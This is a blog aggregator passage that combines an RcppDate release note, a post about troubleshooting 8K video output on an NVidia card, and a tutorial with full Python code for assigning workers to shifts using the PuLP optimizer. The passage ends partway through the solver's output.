RcppDate wraps the featureful date library written by Howard Hinnant for use with R. This header-only modern C++ library has been in pretty wide-spread use for a while now, and adds to C++11/C++14/C++17 what will is (with minor modifications) the ‘date’ library in C++20. The RcppDate adds no extra R or C++ code and can therefore be a zero-cost dependency for any other project; yet a number of other projects decided to re-vendor it resulting in less-efficient duplication. Oh well. C’est la via.
This release sync wuth the (already mostly included) upstream release
3.0.3, and also addresses a new fresh (and mildly esoteric) nag from
clang++-20
. One upstream PR
already addressed this in the files tickled by some CRAN packages, I followed this up
with another
upstream PR addressing this in a few more occurrences.
Changes in version 0.0.5 (2025-03-06)
Updated to upstream version 3.0.3
Updated 'whitespace in literal' issue upsetting clang++-20; this is also fixed upstream via two PRs
Courtesy of my CRANberries, there is also a diffstat report for the most recent release. More information is available at the repository or the package page.
This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. If you like this or other open-source work I do, you can sponsor me at GitHub.
I previously blogged about getting an 8K TV [1]. Now I’m working on getting 8K video out for a computer that talks to it. I borrowed an NVidia RTX A2000 card which according to it’s specs can do 8K [2] with a mini-DisplayPort to HDMI cable rated at 8K but on both Windows and Linux the two highest resolutions on offer are 3840*2160 (regular 4K) and 4096*2160 which is strange and not useful.
The various documents on the A2000 differ on whether it has DisplayPort version 1.4 or 1.4a. According to the DisplayPort Wikipedia page [3] both versions 1.4 and 1.4a have a maximum of HBR3 speed and the difference is what version of DSC (Display Stream Compression [4]) is in use. DSC apparently causes no noticeable loss of quality for movies or games but apparently can be bad for text. According to the DisplayPort Wikipedia page version 1.4 can do 8K uncompressed at 30Hz or 24Hz with high dynamic range. So this should be able to work.
My theories as to why it doesn’t work are:
To get some more input on this issue I posted on Lemmy, here is the Lemmy post [5]. I signed up to lemmy.ml because it was the first one I found that seemed reasonable and was giving away free accounts, I haven’t tried any others and can’t review it but it seems to work well enough and it’s free. It’s described as “A community of privacy and FOSS enthusiasts, run by Lemmy’s developers” which is positive, I recommend that everyone who’s into FOSS create an account there or some other Lemmy server.
My Lemmy post was about what video cards to buy. I was looking at the Gigabyte RX 6400 Eagle 4G as a cheap card from a local store that does 8K, it also does DisplayPort 1.4 so might have the same issues, also apparently FOSS drivers don’t support 8K on HDMI because the people who manage HDMI specs are jerks. It’s a $200 card at MSY and a bit less on ebay so it’s an amount I can afford to risk on a product that might not do what I want, but it seems to have a high probability of getting the same result. The NVidia cards have the option of proprietary drivers which allow using HDMI and there are cards with DisplayPort 1.4 (which can do 8K@30Hz) and HDMI 2.1 (which can do 8K@50Hz). So HDMI is a better option for some cards just based on card output and has the additional benefit of not needing DisplayPort to HDMI conversion.
The best option apparently is the Intel cards which do DisplayPort internally and convert to HDMI in hardware which avoids the issue of FOSS drivers for HDMI at 8K. The Intel Arc B580 has nice specs [6], HDMI 2.1a and DisplayPort 2.1 output, 12G of RAM, and being faster than the low end cards like the RX 6400. But the local computer store price is $470 and the ebay price is a bit over $400. If it turns out to not do what I need it still will be a long way from the worst way I’ve wasted money on computer gear. But I’m still hesitating about this.
Any suggestions?
06 March, 2025 10:53AM by etbe
I recently used the PuLP modeler to solve a work scheduling problem to assign workers to shifts. Here are notes about doing that. This is a common use case, but isn't explicitly covered in the case studies in the PuLP documentation.
Here's the problem:
The tool is supposed to allocate workers to the shifts to try to cover all the shifts, give everybody work, and try to match their preferences. I implemented the tool:
#!/usr/bin/python3 import sys import os import re def report_solution_to_console(vars): for w in days_of_week: annotation = '' if human_annotate is not None: for s in shifts.keys(): m = re.match(rf'{w} - ', s) if not m: continue if vars[human_annotate][s].value(): annotation = f" ({human_annotate} SCHEDULED)" break if not len(annotation): annotation = f" ({human_annotate} OFF)" print(f"{w}{annotation}") for s in shifts.keys(): m = re.match(rf'{w} - ', s) if not m: continue annotation = '' if human_annotate is not None: annotation = f" ({human_annotate} {shifts[s][human_annotate]})" print(f" ---- {s[m.end():]}{annotation}") for h in humans: if vars[h][s].value(): print(f" {h} ({shifts[s][h]})") def report_solution_summary_to_console(vars): print("\nSUMMARY") for h in humans: print(f"-- {h}") print(f" benefit: {benefits[h].value():.3f}") counts = dict() for a in availabilities: counts[a] = 0 for s in shifts.keys(): if vars[h][s].value(): counts[shifts[s][h]] += 1 for a in availabilities: print(f" {counts[a]} {a}") human_annotate = None days_of_week = ('SUNDAY', 'MONDAY', 'TUESDAY', 'WEDNESDAY', 'THURSDAY', 'FRIDAY', 'SATURDAY') humans = ['ALICE', 'BOB', 'CAROL', 'DAVID', 'EVE', 'FRANK', 'GRACE', 'HEIDI', 'IVAN', 'JUDY'] shifts = {'SUNDAY - SANDING 9:00 AM - 4:00 PM': {'ALICE': 'NEUTRAL', 'BOB': 'NEUTRAL', 'CAROL': 'PREFERRED', 'DAVID': 'PREFERRED', 'EVE': 'PREFERRED', 'FRANK': 'PREFERRED', 'GRACE': 'DISFAVORED', 'HEIDI': 'DISFAVORED', 'IVAN': 'PREFERRED', 'JUDY': 'NEUTRAL'}, 'WEDNESDAY - SAWING 7:30 AM - 2:30 PM': {'ALICE': 'NEUTRAL', 'BOB': 'NEUTRAL', 'CAROL': 'PREFERRED', 'DAVID': 'PREFERRED', 'FRANK': 'PREFERRED', 'GRACE': 'NEUTRAL', 'HEIDI': 'DISFAVORED', 'IVAN': 'PREFERRED', 'EVE': 'REFUSED', 'JUDY': 'REFUSED'}, 'THURSDAY - SANDING 9:00 AM - 4:00 PM': {'ALICE': 'NEUTRAL', 'BOB': 'NEUTRAL', 'CAROL': 'PREFERRED', 'DAVID': 'PREFERRED', 'EVE': 'PREFERRED', 'FRANK': 'PREFERRED', 'GRACE': 'PREFERRED', 'HEIDI': 'DISFAVORED', 'IVAN': 'PREFERRED', 'JUDY': 'PREFERRED'}, 'SATURDAY - SAWING 7:30 AM - 2:30 PM': {'ALICE': 'NEUTRAL', 'BOB': 'NEUTRAL', 'CAROL': 'PREFERRED', 'DAVID': 'PREFERRED', 'FRANK': 'PREFERRED', 'HEIDI': 'DISFAVORED', 'IVAN': 'PREFERRED', 'EVE': 'REFUSED', 'JUDY': 'REFUSED', 'GRACE': 'REFUSED'}, 'SUNDAY - SAWING 9:00 AM - 4:00 PM': {'ALICE': 'NEUTRAL', 'BOB': 'NEUTRAL', 'CAROL': 'PREFERRED', 'DAVID': 'PREFERRED', 'EVE': 'PREFERRED', 'FRANK': 'PREFERRED', 'GRACE': 'DISFAVORED', 'IVAN': 'PREFERRED', 'JUDY': 'PREFERRED', 'HEIDI': 'REFUSED'}, 'MONDAY - SAWING 9:00 AM - 4:00 PM': {'ALICE': 'NEUTRAL', 'BOB': 'NEUTRAL', 'CAROL': 'PREFERRED', 'DAVID': 'PREFERRED', 'EVE': 'PREFERRED', 'FRANK': 'PREFERRED', 'GRACE': 'PREFERRED', 'IVAN': 'PREFERRED', 'JUDY': 'PREFERRED', 'HEIDI': 'REFUSED'}, 'TUESDAY - SAWING 9:00 AM - 4:00 PM': {'ALICE': 'NEUTRAL', 'BOB': 'NEUTRAL', 'CAROL': 'PREFERRED', 'DAVID': 'PREFERRED', 'EVE': 'PREFERRED', 'FRANK': 'PREFERRED', 'GRACE': 'NEUTRAL', 'IVAN': 'PREFERRED', 'JUDY': 'PREFERRED', 'HEIDI': 'REFUSED'}, 'WEDNESDAY - PAINTING 7:30 AM - 2:30 PM': {'ALICE': 'NEUTRAL', 'BOB': 'NEUTRAL', 'CAROL': 'PREFERRED', 'FRANK': 'PREFERRED', 'GRACE': 'NEUTRAL', 'HEIDI': 'DISFAVORED', 'IVAN': 'PREFERRED', 'EVE': 'REFUSED', 'JUDY': 'REFUSED', 'DAVID': 'REFUSED'}, 'THURSDAY - SAWING 9:00 AM - 4:00 PM': {'ALICE': 'NEUTRAL', 'BOB': 'NEUTRAL', 'CAROL': 'PREFERRED', 'DAVID': 'PREFERRED', 'EVE': 'PREFERRED', 'FRANK': 'PREFERRED', 'GRACE': 'PREFERRED', 'IVAN': 'PREFERRED', 'JUDY': 'PREFERRED', 'HEIDI': 'REFUSED'}, 'FRIDAY - SAWING 9:00 AM - 4:00 PM': {'ALICE': 'NEUTRAL', 'BOB': 'NEUTRAL', 'CAROL': 'PREFERRED', 'DAVID': 'PREFERRED', 'EVE': 'PREFERRED', 'FRANK': 'PREFERRED', 'GRACE': 'PREFERRED', 'IVAN': 'PREFERRED', 'JUDY': 'DISFAVORED', 'HEIDI': 'REFUSED'}, 'SATURDAY - PAINTING 7:30 AM - 2:30 PM': {'ALICE': 'NEUTRAL', 'BOB': 'NEUTRAL', 'CAROL': 'PREFERRED', 'FRANK': 'PREFERRED', 'HEIDI': 'DISFAVORED', 'IVAN': 'PREFERRED', 'EVE': 'REFUSED', 'JUDY': 'REFUSED', 'GRACE': 'REFUSED', 'DAVID': 'REFUSED'}, 'SUNDAY - PAINTING 9:45 AM - 4:45 PM': {'ALICE': 'NEUTRAL', 'BOB': 'NEUTRAL', 'CAROL': 'NEUTRAL', 'EVE': 'PREFERRED', 'FRANK': 'PREFERRED', 'GRACE': 'DISFAVORED', 'IVAN': 'PREFERRED', 'JUDY': 'PREFERRED', 'HEIDI': 'REFUSED', 'DAVID': 'REFUSED'}, 'MONDAY - PAINTING 9:45 AM - 4:45 PM': {'ALICE': 'NEUTRAL', 'BOB': 'NEUTRAL', 'CAROL': 'NEUTRAL', 'EVE': 'PREFERRED', 'FRANK': 'PREFERRED', 'GRACE': 'PREFERRED', 'IVAN': 'PREFERRED', 'JUDY': 'NEUTRAL', 'HEIDI': 'REFUSED', 'DAVID': 'REFUSED'}, 'TUESDAY - PAINTING 9:45 AM - 4:45 PM': {'ALICE': 'NEUTRAL', 'BOB': 'NEUTRAL', 'CAROL': 'NEUTRAL', 'EVE': 'PREFERRED', 'FRANK': 'PREFERRED', 'GRACE': 'NEUTRAL', 'IVAN': 'PREFERRED', 'JUDY': 'PREFERRED', 'HEIDI': 'REFUSED', 'DAVID': 'REFUSED'}, 'WEDNESDAY - SANDING 9:45 AM - 4:45 PM': {'ALICE': 'NEUTRAL', 'BOB': 'NEUTRAL', 'CAROL': 'NEUTRAL', 'DAVID': 'PREFERRED', 'FRANK': 'PREFERRED', 'GRACE': 'NEUTRAL', 'HEIDI': 'DISFAVORED', 'IVAN': 'PREFERRED', 'JUDY': 'NEUTRAL', 'EVE': 'REFUSED'}, 'THURSDAY - PAINTING 9:45 AM - 4:45 PM': {'ALICE': 'NEUTRAL', 'BOB': 'NEUTRAL', 'CAROL': 'NEUTRAL', 'EVE': 'PREFERRED', 'FRANK': 'PREFERRED', 'GRACE': 'NEUTRAL', 'IVAN': 'PREFERRED', 'JUDY': 'PREFERRED', 'HEIDI': 'REFUSED', 'DAVID': 'REFUSED'}, 'FRIDAY - PAINTING 9:45 AM - 4:45 PM': {'ALICE': 'NEUTRAL', 'BOB': 'NEUTRAL', 'CAROL': 'NEUTRAL', 'EVE': 'PREFERRED', 'FRANK': 'PREFERRED', 'GRACE': 'PREFERRED', 'IVAN': 'PREFERRED', 'JUDY': 'DISFAVORED', 'HEIDI': 'REFUSED', 'DAVID': 'REFUSED'}, 'SATURDAY - SANDING 9:45 AM - 4:45 PM': {'ALICE': 'NEUTRAL', 'BOB': 'NEUTRAL', 'CAROL': 'NEUTRAL', 'DAVID': 'PREFERRED', 'FRANK': 'PREFERRED', 'HEIDI': 'DISFAVORED', 'IVAN': 'PREFERRED', 'EVE': 'REFUSED', 'JUDY': 'REFUSED', 'GRACE': 'REFUSED'}, 'SUNDAY - PAINTING 11:00 AM - 6:00 PM': {'ALICE': 'NEUTRAL', 'BOB': 'NEUTRAL', 'CAROL': 'NEUTRAL', 'EVE': 'DISFAVORED', 'FRANK': 'NEUTRAL', 'GRACE': 'NEUTRAL', 'HEIDI': 'PREFERRED', 'IVAN': 'NEUTRAL', 'JUDY': 'NEUTRAL', 'DAVID': 'REFUSED'}, 'MONDAY - PAINTING 12:00 PM - 7:00 PM': {'ALICE': 'NEUTRAL', 'BOB': 'NEUTRAL', 'CAROL': 'NEUTRAL', 'EVE': 'DISFAVORED', 'FRANK': 'NEUTRAL', 'GRACE': 'PREFERRED', 'IVAN': 'NEUTRAL', 'JUDY': 'NEUTRAL', 'HEIDI': 'REFUSED', 'DAVID': 'REFUSED'}, 'TUESDAY - PAINTING 12:00 PM - 7:00 PM': {'ALICE': 'NEUTRAL', 'BOB': 'NEUTRAL', 'CAROL': 'NEUTRAL', 'EVE': 'DISFAVORED', 'FRANK': 'NEUTRAL', 'GRACE': 'NEUTRAL', 'IVAN': 'NEUTRAL', 'HEIDI': 'REFUSED', 'JUDY': 'REFUSED', 'DAVID': 'REFUSED'}, 'WEDNESDAY - PAINTING 12:00 PM - 7:00 PM': {'ALICE': 'NEUTRAL', 'BOB': 'NEUTRAL', 'CAROL': 'NEUTRAL', 'FRANK': 'NEUTRAL', 'GRACE': 'NEUTRAL', 'IVAN': 'NEUTRAL', 'JUDY': 'PREFERRED', 'EVE': 'REFUSED', 'HEIDI': 'REFUSED', 'DAVID': 'REFUSED'}, 'THURSDAY - PAINTING 12:00 PM - 7:00 PM': {'ALICE': 'NEUTRAL', 'BOB': 'NEUTRAL', 'CAROL': 'NEUTRAL', 'EVE': 'DISFAVORED', 'FRANK': 'NEUTRAL', 'GRACE': 'NEUTRAL', 'IVAN': 'NEUTRAL', 'JUDY': 'PREFERRED', 'HEIDI': 'REFUSED', 'DAVID': 'REFUSED'}, 'FRIDAY - PAINTING 12:00 PM - 7:00 PM': {'ALICE': 'NEUTRAL', 'BOB': 'NEUTRAL', 'CAROL': 'NEUTRAL', 'EVE': 'DISFAVORED', 'FRANK': 'NEUTRAL', 'GRACE': 'NEUTRAL', 'IVAN': 'NEUTRAL', 'JUDY': 'DISFAVORED', 'HEIDI': 'REFUSED', 'DAVID': 'REFUSED'}, 'SATURDAY - PAINTING 12:00 PM - 7:00 PM': {'ALICE': 'NEUTRAL', 'BOB': 'NEUTRAL', 'CAROL': 'NEUTRAL', 'FRANK': 'NEUTRAL', 'IVAN': 'NEUTRAL', 'JUDY': 'DISFAVORED', 'EVE': 'REFUSED', 'HEIDI': 'REFUSED', 'GRACE': 'REFUSED', 'DAVID': 'REFUSED'}, 'SUNDAY - SAWING 12:00 PM - 7:00 PM': {'ALICE': 'PREFERRED', 'BOB': 'PREFERRED', 'CAROL': 'NEUTRAL', 'EVE': 'DISFAVORED', 'FRANK': 'NEUTRAL', 'GRACE': 'NEUTRAL', 'IVAN': 'NEUTRAL', 'JUDY': 'PREFERRED', 'HEIDI': 'REFUSED', 'DAVID': 'REFUSED'}, 'MONDAY - SAWING 2:00 PM - 9:00 PM': {'ALICE': 'PREFERRED', 'BOB': 'PREFERRED', 'CAROL': 'DISFAVORED', 'EVE': 'DISFAVORED', 'FRANK': 'NEUTRAL', 'GRACE': 'NEUTRAL', 'IVAN': 'DISFAVORED', 'JUDY': 'DISFAVORED', 'HEIDI': 'REFUSED', 'DAVID': 'REFUSED'}, 'TUESDAY - SAWING 2:00 PM - 9:00 PM': {'ALICE': 'PREFERRED', 'BOB': 'PREFERRED', 'CAROL': 'DISFAVORED', 'EVE': 'DISFAVORED', 'FRANK': 'NEUTRAL', 'GRACE': 'NEUTRAL', 'IVAN': 'DISFAVORED', 'HEIDI': 'REFUSED', 'JUDY': 'REFUSED', 'DAVID': 'REFUSED'}, 'WEDNESDAY - SAWING 2:00 PM - 9:00 PM': {'ALICE': 'PREFERRED', 'BOB': 'PREFERRED', 'CAROL': 'DISFAVORED', 'FRANK': 'NEUTRAL', 'GRACE': 'NEUTRAL', 'IVAN': 'DISFAVORED', 'JUDY': 'DISFAVORED', 'EVE': 'REFUSED', 'HEIDI': 'REFUSED', 'DAVID': 'REFUSED'}, 'THURSDAY - SAWING 2:00 PM - 9:00 PM': {'ALICE': 'PREFERRED', 'BOB': 'PREFERRED', 'CAROL': 'DISFAVORED', 'EVE': 'DISFAVORED', 'FRANK': 'NEUTRAL', 'GRACE': 'NEUTRAL', 'IVAN': 'DISFAVORED', 'JUDY': 'DISFAVORED', 'HEIDI': 'REFUSED', 'DAVID': 'REFUSED'}, 'FRIDAY - SAWING 2:00 PM - 9:00 PM': {'ALICE': 'PREFERRED', 'BOB': 'PREFERRED', 'CAROL': 'DISFAVORED', 'EVE': 'DISFAVORED', 'FRANK': 'NEUTRAL', 'GRACE': 'NEUTRAL', 'IVAN': 'DISFAVORED', 'HEIDI': 'REFUSED', 'JUDY': 'REFUSED', 'DAVID': 'REFUSED'}, 'SATURDAY - SAWING 2:00 PM - 9:00 PM': {'ALICE': 'PREFERRED', 'BOB': 'PREFERRED', 'CAROL': 'DISFAVORED', 'FRANK': 'NEUTRAL', 'IVAN': 'DISFAVORED', 'JUDY': 'DISFAVORED', 'EVE': 'REFUSED', 'HEIDI': 'REFUSED', 'GRACE': 'REFUSED', 'DAVID': 'REFUSED'}, 'SUNDAY - PAINTING 12:15 PM - 7:15 PM': {'ALICE': 'NEUTRAL', 'BOB': 'NEUTRAL', 'CAROL': 'PREFERRED', 'EVE': 'DISFAVORED', 'FRANK': 'NEUTRAL', 'GRACE': 'NEUTRAL', 'HEIDI': 'NEUTRAL', 'IVAN': 'DISFAVORED', 'JUDY': 'NEUTRAL', 'DAVID': 'REFUSED'}, 'MONDAY - PAINTING 2:00 PM - 9:00 PM': {'ALICE': 'NEUTRAL', 'BOB': 'NEUTRAL', 'CAROL': 'DISFAVORED', 'EVE': 'DISFAVORED', 'FRANK': 'NEUTRAL', 'GRACE': 'NEUTRAL', 'HEIDI': 'NEUTRAL', 'IVAN': 'DISFAVORED', 'JUDY': 'DISFAVORED', 'DAVID': 'REFUSED'}, 'TUESDAY - PAINTING 2:00 PM - 9:00 PM': {'ALICE': 'NEUTRAL', 'BOB': 'NEUTRAL', 'CAROL': 'DISFAVORED', 'EVE': 'DISFAVORED', 'FRANK': 'NEUTRAL', 'GRACE': 'NEUTRAL', 'HEIDI': 'NEUTRAL', 'IVAN': 'DISFAVORED', 'JUDY': 'REFUSED', 'DAVID': 'REFUSED'}, 'WEDNESDAY - PAINTING 2:00 PM - 9:00 PM': {'ALICE': 'NEUTRAL', 'BOB': 'NEUTRAL', 'CAROL': 'DISFAVORED', 'FRANK': 'NEUTRAL', 'GRACE': 'NEUTRAL', 'HEIDI': 'NEUTRAL', 'IVAN': 'DISFAVORED', 'JUDY': 'DISFAVORED', 'EVE': 'REFUSED', 'DAVID': 'REFUSED'}, 'THURSDAY - PAINTING 2:00 PM - 9:00 PM': {'ALICE': 'NEUTRAL', 'BOB': 'NEUTRAL', 'CAROL': 'DISFAVORED', 'EVE': 'DISFAVORED', 'FRANK': 'NEUTRAL', 'GRACE': 'NEUTRAL', 'HEIDI': 'NEUTRAL', 'IVAN': 'DISFAVORED', 'JUDY': 'DISFAVORED', 'DAVID': 'REFUSED'}, 'FRIDAY - PAINTING 2:00 PM - 9:00 PM': {'ALICE': 'NEUTRAL', 'BOB': 'NEUTRAL', 'CAROL': 'DISFAVORED', 'EVE': 'DISFAVORED', 'FRANK': 'NEUTRAL', 'GRACE': 'NEUTRAL', 'HEIDI': 'NEUTRAL', 'IVAN': 'DISFAVORED', 'JUDY': 'REFUSED', 'DAVID': 'REFUSED'}, 'SATURDAY - PAINTING 2:00 PM - 9:00 PM': {'ALICE': 'NEUTRAL', 'BOB': 'NEUTRAL', 'CAROL': 'DISFAVORED', 'FRANK': 'NEUTRAL', 'HEIDI': 'NEUTRAL', 'IVAN': 'DISFAVORED', 'JUDY': 'DISFAVORED', 'EVE': 'REFUSED', 'GRACE': 'REFUSED', 'DAVID': 'REFUSED'}} availabilities = ['PREFERRED', 'NEUTRAL', 'DISFAVORED'] import pulp prob = pulp.LpProblem("Scheduling", pulp.LpMaximize) vars = pulp.LpVariable.dicts("Assignments", (humans, shifts.keys()), None,None, # bounds; unused, since these are binary variables pulp.LpBinary) # Everyone works at least 2 shifts Nshifts_min = 2 for h in humans: prob += ( pulp.lpSum([vars[h][s] for s in shifts.keys()]) >= Nshifts_min, f"{h} works at least {Nshifts_min} shifts", ) # each shift is ~ 8 hours, so I limit everyone to 40/8 = 5 shifts Nshifts_max = 5 for h in humans: prob += ( pulp.lpSum([vars[h][s] for s in shifts.keys()]) <= Nshifts_max, f"{h} works at most {Nshifts_max} shifts", ) # all shifts staffed and not double-staffed for s in shifts.keys(): prob += ( pulp.lpSum([vars[h][s] for h in humans]) == 1, f"{s} is staffed", ) # each human can work at most one shift on any given day for w in days_of_week: for h in humans: prob += ( pulp.lpSum([vars[h][s] for s in shifts.keys() if re.match(rf'{w} ',s)]) <= 1, f"{h} cannot be double-booked on {w}" ) #### Some explicit constraints; as an example # DAVID can't work any PAINTING shift and is off on Thu and Sun h = 'DAVID' prob += ( pulp.lpSum([vars[h][s] for s in shifts.keys() if re.search(r'- PAINTING',s)]) == 0, f"{h} can't work any PAINTING shift" ) prob += ( pulp.lpSum([vars[h][s] for s in shifts.keys() if re.match(r'THURSDAY|SUNDAY',s)]) == 0, f"{h} is off on Thursday and Sunday" ) # Do not assign any "REFUSED" shifts for s in shifts.keys(): for h in humans: if shifts[s][h] == 'REFUSED': prob += ( vars[h][s] == 0, f"{h} is not available for {s}" ) # Objective. I try to maximize the "happiness". Each human sees each shift as # one of: # # PREFERRED # NEUTRAL # DISFAVORED # REFUSED # # I set a hard constraint to handle "REFUSED", and arbitrarily, I set these # benefit values for the others benefit_availability = dict() benefit_availability['PREFERRED'] = 3 benefit_availability['NEUTRAL'] = 2 benefit_availability['DISFAVORED'] = 1 # Not used, since this is a hard constraint. But the code needs this to be a # part of the benefit. I can ignore these in the code, but let's keep this # simple benefit_availability['REFUSED' ] = -1000 benefits = dict() for h in humans: benefits[h] = \ pulp.lpSum([vars[h][s] * benefit_availability[shifts[s][h]] \ for s in shifts.keys()]) benefit_total = \ pulp.lpSum([benefits[h] \ for h in humans]) prob += ( benefit_total, "happiness", ) prob.solve() if pulp.LpStatus[prob.status] == "Optimal": report_solution_to_console(vars) report_solution_summary_to_console(vars)
The set of workers is in the humans
variable, and the shift schedule and the
workers' preferences are encoded in the shifts
dict. The problem is defined by
a vars
dict of dicts, each a boolean variable indicating whether a particular
worker is scheduled for a particular shift. We define a set of constraints to
these worker allocations to restrict ourselves to valid solutions. And among
these valid solutions, we try to find the one that maximizes some benefit
function, defined here as:
benefit_availability = dict() benefit_availability['PREFERRED'] = 3 benefit_availability['NEUTRAL'] = 2 benefit_availability['DISFAVORED'] = 1 benefits = dict() for h in humans: benefits[h] = \ pulp.lpSum([vars[h][s] * benefit_availability[shifts[s][h]] \ for s in shifts.keys()]) benefit_total = \ pulp.lpSum([benefits[h] \ for h in humans])
So for instance each shift that was scheduled as somebody's PREFERRED shift gives us 3 benefit points. And if all the shifts ended up being PREFERRED, we'd have a total benefit value of 3*Nshifts. This is impossible, however, because that would violate some constraints in the problem.
The exact trade-off between the different preferences is set in the
benefit_availability
dict. With the above numbers, it's equally good for
somebody to have a NEUTRAL shift and a day off as it is for them to have
DISFAVORED shifts. If we really want to encourage the program to work people as
much as possible (days off discouraged), we'd want to raise the DISFAVORED
threshold.
I run this program and I get:
.... Result - Optimal solution found Objective value: 108.00000000 Enumerated nodes: 0 Total iterations: 0 Time (CPU seconds): 0.01 Time (Wallclock seconds): 0.01 Option for printingOptions changed from normal to all Total time (CPU seconds): 0.02 (Wallclock seconds): 0.02 SUNDAY ---- SANDING 9:00 AM - 4:00 PM EVE (PREFERRED) ---- SAWING 9:00 AM - 4:00 PM IVAN (PREFERRED) ---- PAINTING 9:45 AM - 4:45 PM FRANK (PREFERRED) ---- PAINTING 11:00 AM - 6:00 PM HEIDI (PREFERRED) ---- SAWING 12:00 PM - 7:00 PM ALICE (PREFERRED) ---- PAINTING 12:15 PM - 7:15 PM CAROL (PREFERRED) MONDAY ---- SAWING 9:00 AM - 4:00 PM DAVID (PREFERRED) ---- PAINTING 9:45 AM - 4:45 PM IVAN (PREFERRED) ---- PAINTING 12:00 PM - 7:00 PM GRACE (PREFERRED) ---- SAWING 2:00 PM - 9:00 PM ALICE (PREFERRED) ---- PAINTING 2:00 PM - 9:00 PM HEIDI (NEUTRAL) TUESDAY ---- SAWING 9:00 AM - 4:00 PM DAVID (PREFERRED) ---- PAINTING 9:45 AM - 4:45 PM EVE (PREFERRED) ---- PAINTING 12:00 PM - 7:00 PM FRANK (NEUTRAL) ---- SAWING 2:00 PM - 9:00 PM BOB (PREFERRED) ---- PAINTING 2:00 PM - 9:00 PM HEIDI (NEUTRAL) WEDNESDAY ---- SAWING 7:30 AM - 2:30 PM DAVID (PREFERRED) ---- PAINTING 7:30 AM - 2:30 PM IVAN (PREFERRED) ---- SANDING 9:45 AM - 4:45 PM FRANK (PREFERRED) ---- PAINTING 12:00 PM - 7:00 PM JUDY (PREFERRED) ---- SAWING 2:00 PM - 9:00 PM BOB (PREFERRED) ---- PAINTING 2:00 PM - 9:00 PM ALICE (NEUTRAL) THURSDAY ---- SANDING 9:00 AM - 4:00 PM GRACE (PREFERRED) ---- SAWING 9:00 AM - 4:00 PM CAROL (PREFERRED) ---- PAINTING 9:45 AM - 4:45 PM EVE (PREFERRED) ---- PAINTING 12:00 PM - 7:00 PM JUDY (PREFERRED) ---- SAWING 2:00 PM - 9:00 PM BOB (PREFERRED) ---- PAINTING 2:00 PM - 9:00 PM ALICE (NEUTRAL) FRIDAY ---- SAWING 9:00 AM - 4:00 PM DAVID (PREFERRED) ---- PAINTING 9:45 AM - 4:45 PM FRANK (PREFERRED) ---- PAINTING 12:00 PM - 7:00 PM GRACE (NEUTRAL) ---- SAWING 2:00 PM - 9:00 PM BOB (PREFERRED) ---- PAINTING 2:00 PM - 9:00 PM HEIDI (NEUTRAL) SATURDAY ---- SAWING 7:30 AM - 2:30 PM CAROL (PREFERRED) ---- PAINTING 7:30 AM - 2:30 PM IVAN (PREFERRED) ---- SANDING 9:45 AM - 4:45 PM DAVID (PREFERRED) ---- PAINTING 12:00 PM - 7:00 PM FRANK (NEUTRAL) ---- SAWING 2:00 PM - 9:00 PM ALICE (PREFERRED) ---- PAINTING 2:00 PM - 9:00 PM BOB (NEUTRAL) SUMMARY -- ALICE benefit: 13.000 3 PREFERRED 2 NEUTRAL 0 DISFAVORED -- BOB benefit: 14.000 4 PREFERRED 1 NEUTRAL 0 DISFAVORED -- CAROL benefit: 9.000 3 PREFERRED 0 NEUTRAL 0 DISFAVORED -- DAVID benefit: 15.000 5 PREFERRED 0 NEUTRAL 0 DISFAVORED -- EVE benefit: 9.000 3 PREFERRED 0 NEUTRAL 0 DISFAVORED -- FRANK benefit: 13.000 3 PREFERRED 2 NEUTRAL 0 DISFAVORED -- GRACE benefit: 8.000 2 PREFERRED 1 NEUTRAL 0 DISFAVORED -- HEIDI benefit: 9.000 1 PREFERRED 3 NEUTRAL 0 DISFAVORED -- IVAN benefit: 12.000 4 PREFERRED 0 NEUTRAL 0 DISFAVORED -- JUDY benefit: 6.000 2 PREFERRED 0 NEUTRAL 0 DISFAVORED
So we have a solution! We have 108 total benefit points. But it looks a bit uneven: Judy only works 2 days, while some people work many more: David works 5 for instance. Why is that? I update the program with =human_annotate = 'JUDY'=, run it again, and it tells me more about Judy's preferences:
Objective value: 108.00000000 Enumerated nodes: 0 Total iterations: 0 Time (CPU seconds): 0.01 Time (Wallclock seconds): 0.01 Option for printingOptions changed from normal to all Total time (CPU seconds): 0.01 (Wallclock seconds): 0.02 SUNDAY (JUDY OFF) ---- SANDING 9:00 AM - 4:00 PM (JUDY NEUTRAL) EVE (PREFERRED) ---- SAWING 9:00 AM - 4:00 PM (JUDY PREFERRED) IVAN (PREFERRED) ---- PAINTING 9:45 AM - 4:45 PM (JUDY PREFERRED) FRANK (PREFERRED) ---- PAINTING 11:00 AM - 6:00 PM (JUDY NEUTRAL) HEIDI (PREFERRED) ---- SAWING 12:00 PM - 7:00 PM (JUDY PREFERRED) ALICE (PREFERRED) ---- PAINTING 12:15 PM - 7:15 PM (JUDY NEUTRAL) CAROL (PREFERRED) MONDAY (JUDY OFF) ---- SAWING 9:00 AM - 4:00 PM (JUDY PREFERRED) DAVID (PREFERRED) ---- PAINTING 9:45 AM - 4:45 PM (JUDY NEUTRAL) IVAN (PREFERRED) ---- PAINTING 12:00 PM - 7:00 PM (JUDY NEUTRAL) GRACE (PREFERRED) ---- SAWING 2:00 PM - 9:00 PM (JUDY DISFAVORED) ALICE (PREFERRED) ---- PAINTING 2:00 PM - 9:00 PM (JUDY DISFAVORED) HEIDI (NEUTRAL) TUESDAY (JUDY OFF) ---- SAWING 9:00 AM - 4:00 PM (JUDY PREFERRED) DAVID (PREFERRED) ---- PAINTING 9:45 AM - 4:45 PM (JUDY PREFERRED) EVE (PREFERRED) ---- PAINTING 12:00 PM - 7:00 PM (JUDY REFUSED) FRANK (NEUTRAL) ---- SAWING 2:00 PM - 9:00 PM (JUDY REFUSED) BOB (PREFERRED) ---- PAINTING 2:00 PM - 9:00 PM (JUDY REFUSED) HEIDI (NEUTRAL) WEDNESDAY (JUDY SCHEDULED) ---- SAWING 7:30 AM - 2:30 PM (JUDY REFUSED) DAVID (PREFERRED) ---- PAINTING 7:30 AM - 2:30 PM (JUDY REFUSED) IVAN (PREFERRED) ---- SANDING 9:45 AM - 4:45 PM (JUDY NEUTRAL) FRANK (PREFERRED) ---- PAINTING 12:00 PM - 7:00 PM (JUDY PREFERRED) JUDY (PREFERRED) ---- SAWING 2:00 PM - 9:00 PM (JUDY DISFAVORED) BOB (PREFERRED) ---- PAINTING 2:00 PM - 9:00 PM (JUDY DISFAVORED) ALICE (NEUTRAL) THURSDAY (JUDY SCHEDULED) ---- SANDING 9:00 AM - 4:00 PM (JUDY PREFERRED) GRACE (PREFERRED) ---- SAWING 9:00 AM - 4:00 PM (JUDY 